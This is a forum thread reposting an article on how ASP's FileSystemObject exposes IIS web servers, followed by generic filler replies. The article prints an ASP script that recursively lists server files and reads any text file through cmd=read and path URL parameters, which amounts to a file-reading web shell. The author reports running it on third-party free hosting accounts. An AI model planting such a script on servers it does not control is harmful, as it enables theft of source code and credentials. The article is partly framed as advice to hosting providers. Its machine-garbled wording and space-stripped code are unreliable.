仓酷云

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 647|回复: 11
打印 上一主题 下一主题

[学习教程] ASP网站制作之ASP中FSO工具对IIS WEB服务器数据平安的...

[复制链接]
谁可相欹 该用户已被删除
跳转到指定楼层
楼主
发表于 2015-1-16 22:57:11 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
缺点:正版成本价格贵(盗版就不说了)、不够安全,大多数服务器用windows系统,没有linux安全fso|iis|web|web服务|web服务器|平安|工具|数据scripting.filesystemobject工具是由scrrun.dll供应的很多供vbscript/jscript把持的com工具之一。scripting.filesystemobject供应了十分便当的文本文件和文件目次的会见,可是同时也对iisweb服务器数据平安形成了必定的威逼。

filefinder的代码很复杂,由3个函数和30行摆布的按次代码组成。

最关头的是findfiles函数,经由过程对它的递回挪用完成对某个目次的遍历,而且依照特定的文件扩大名来征采这些文件。


functionfindfiles(strstartfolder,strext)

dimn

dimothisfolder

dimofolders

dimofiles

dimofolder

dimofile


假如体系办理员对文件体系的权限举行仔细的设置话,上面的代码就要堕落

可是有些目次仍是能够观察的,以是我们复杂的把毛病疏忽已往

onerrorresumenext

n=0

response.write"<b>searching"&strstartfolder&"</b><br>"

setothisfolder=g_fs.getfolder(strstartfolder)

setofiles=othisfolder.files

foreachofileinofiles

假如是指定的文件扩大名,输入毗连导向自己,但用分歧的命令cmd

在这里是cmd=read,即读出指定物理路径的文本文件

ifissuffix(ofile.path,strext)then

response.write"<atarget=_blankhref=ff.asp?cmd=read&path="&server.htmlencode(ofile.path)&"><fontcolor=dodgerblue>"&ofile.path&"</font></a><br>"

iferr=0then

n=n+1

endif

endif

next

setofolders=othisfolder.subfolders

foreachofolderinofolders

n=n+findfiles(ofolder.path,strext)

next

findfiles=n

endfunction

上面的代码是对url前面的参数举行剖析:


读出各个参数的值

strcmd=ucase(request.querystring("cmd"))

strpath=request.querystring("path")

strext=request.querystring("ext")

brawdata=ucase(request.querystring("raw"))

默许搜刮.asp文件

ifstrpath=""then

strpath="."

endif

ifstrext=""then

strext=".asp"

endif


依据分歧的命令cmd实行分歧的代码

selectcasestrcmd

case"find"

response.writefindfiles(strpath,strext)&"file(s)found"

case"read"

ifbrawdata="t"then

response.writereadtextfile(strpath)

else

response.write"<pre>"&server.htmlencode(readtextfile(strpath))&"</pre>"

endif

caseelse

response.write"<h3>pleasespecifyacommandtoexecute</h3>"

endselect

从下面的剖析能够看出,假如有充足的权限的话,我们就能够经由过程filefinder来查找iisweb服务器上的恣意文本文件,而且能够轻松的观察文件内容。关于非文本文件,能够断定他们是不是存在及其地点路径,这关于初级hacker们来讲,这些信息偶然是极为主要的。

可是这些对数据平安的威逼的条件前提是实行ff.asp的用户最少具有读取目次和文件的权限。因为windowsntserver在安装后的默许平安设置是一切用户都能够“读取”目次和文件,以是不论是iis默许的你名用户iusr_servername仍是其余甚么用户,都能够顺列的读取目次和文件的信息。而年夜多半windowsntserver体系办理员次要体贴体系是不是可以运转的起来,一样平常不肯意往修改默许的目次和文件权限,究竟那样做要冒很年夜的风险,并且必要良多次得履历。以是,我们能够用filefinder来反省作为web服务器的ntserver的文件体系的平安设置是不是平安。

作者专门对作为iisweb服务器的文件体系的权限举行了野生设置,但限于没有履历,招致了很多奇异的毛病征象,如:所用的做实行的ntserver4.0不克不及举行access数据库的毗连。而在举行文件体系权限修改之前,这些功效是一般的。

本着地道研讨的目标,作者还在我所请求的收费asp空间上作了实验(包含csdn供应的我的团体主页),了局是filefinder都能够顺遂运转。而在http://www2.domaindlx.com/index.html请求的团体主页却没有这个成绩,可见这个收费asp主页供应商在这方面做的仍是对照仔细的。只管domaindlx的web服务器运转在windows2000server上的,其默许的文件体系的平安权限和nt4.0没有很年夜的不同。

因为作者的才能无限,就对这个成绩会商到这里。仅以此文来向国际的asp主页供应商供应参考定见,但愿能对供应商和客户两边的数据平安都有所匡助。

附:用别的相似的服务器端剧本来运转的web服务,假如也供应相似scripting.filesystemobject的对文件体系操纵的功效,不论甚么平台应当存在一样的成绩。

</p>由于ASP还是一种Script语言所没除了大量使用组件外,没有办法提高其工作效率。它必须面对即时编绎的时间考验,同时我们还不知其背后的组件会是一个什么样的状况;
谁可相欹 该用户已被删除
沙发
 楼主| 发表于 2015-1-20 06:24:39 | 只看该作者
我认为比较好的方法是找一些比较经典的例子,每个例子比较集中一种编程思想而设计的。
愤怒的大鸟 该用户已被删除
板凳
发表于 2015-1-21 16:22:49 | 只看该作者
作为IE上广为流传的动态网页开发技术,ASP以它简单易学博得了广大WEB程序爱好这的青睐,而且它对运行环境和开发品台的不挑剔,以及有大量有效的参考手册,极大的推广了它的发展。
小魔女 该用户已被删除
地板
发表于 2015-1-25 13:32:24 | 只看该作者
多看多学多思。多看一些关于ASP的书籍,一方面可以扩展知识面一方面可以鉴借别人是如何掌握、运用ASP的;多学善于关注别人,向同学老师多多学习,不论知识的大小;多思则是要将学到的知识灵活运用。
若相依 该用户已被删除
5#
发表于 2015-1-29 15:29:32 | 只看该作者
ASP.Net摆脱了以前ASP使用脚本语言来编程的缺点,理论上可以使用任何编程语言包括C++,VB,JS等等,当然,最合适的编程语言还是MS为.NetFrmaework专门推出的C(读csharp),它可以看作是VC和Java的混合体吧。
若天明 该用户已被删除
6#
发表于 2015-1-30 12:13:14 | 只看该作者
Request:从字面上讲就是“请求”,因此这个是处理客户端提交的东东的,例如Resuest.Form,Request.QueryString,或者干脆Request("变量名")
山那边是海 该用户已被删除
7#
发表于 2015-2-6 11:23:51 | 只看该作者
用户端的浏览器不需要提供任何别的支持,这样大提高了用户与服务器之间的交互的速度。
爱飞 该用户已被删除
8#
发表于 2015-2-16 01:37:11 | 只看该作者
运用ASP可将VBscript、javascript等脚本语言嵌入到HTML中,便可快速完成网站的应用程序,无需编译,可在服务器端直接执行。容易编写,使用普通的文本编辑器编写,如记事本就可以完成。由脚本在服务器上而不是客户端运行,ASP所使用的脚本语言都在服务端上运行。
精灵巫婆 该用户已被删除
9#
发表于 2015-3-4 21:50:13 | 只看该作者
从事这个行业,那么你可以学ASP语言,简单快速上手,熟练dreamweav排版,写asp代码,熟练photoshop处理图片,打好基础就行了
乐观 该用户已被删除
10#
发表于 2015-3-11 21:12:15 | 只看该作者
运用ASP可将VBscript、javascript等脚本语言嵌入到HTML中,便可快速完成网站的应用程序,无需编译,可在服务器端直接执行。容易编写,使用普通的文本编辑器编写,如记事本就可以完成。由脚本在服务器上而不是客户端运行,ASP所使用的脚本语言都在服务端上运行。
冷月葬花魂 该用户已被删除
11#
发表于 2015-3-19 13:25:42 | 只看该作者
兴趣爱好,那么你无须学编程,申请一个域名和空间,在网上下载一些免费开源的CMS系统,你不用改代码,只须熟悉它们的后台操作,像office一样简单方便,很快就能建一个站点,很多站长都是这样做的
小女巫 该用户已被删除
12#
发表于 2015-3-28 04:33:14 | 只看该作者
我就感觉到ASP和一些常用的数据库编程以及软件工程方面的思想是非常重要的。我现在也在尝试自己做网页,这其中就用到了ASP,我想它的作用是可想而知的。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|仓酷云 鄂ICP备14007578号-2

GMT+8, 2024-12-23 17:07

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表